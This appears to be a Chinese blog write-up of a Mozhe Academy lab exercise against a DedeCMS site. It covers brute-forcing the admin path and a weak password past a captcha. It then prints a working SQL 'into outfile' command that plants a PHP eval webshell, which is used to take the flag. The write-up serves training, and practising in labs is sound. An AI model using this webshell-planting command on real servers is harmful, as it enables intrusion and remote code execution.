美文网首页
墨者学院-CMS系统漏洞分析溯源(第8题)

墨者学院-CMS系统漏洞分析溯源(第8题)

作者: nohands_noob | 来源:发表于2019-07-12 19:53 被阅读0次

    靶场地址:
    https://www.mozhe.cn/bug/detail/UFZ4K3FhM0JudDdyempzazhreGlBZz09bW96aGUmozhe

    试着访问dedecms后台的默认路径/dede/,失败,尝试猜解其他也猜解不出,使用DirBuster爆破路径


    爆破出/manager,访问http://ip/manager/ 发现后台地址

    尝试弱密码登录,试了一些都没试出来,使用BurpSuite爆破,发现验证码会更新,没办法只能用Pkav HTTP Fuzzer来爆破了,使用的字典是弱密码top1000。


    由于验证码的清晰度非常低,识别经常出错,跑了很多次,也用了很多时间,最后跑出来密码是password,哇的一声哭了出来,这个都没猜到,用了我那么多时间


    登录到后台,利用sql命令执行写入一句话木马,接着使用菜刀连接获得key
    sql命令:select '<?php @eval($_POST[cmd])?>' into outfile '/var/www/html/cmd.php'


    获得key

    相关文章

      网友评论

          本文标题:墨者学院-CMS系统漏洞分析溯源(第8题)

          本文链接:https://www.haomeiwen.com/subject/glzykctx.html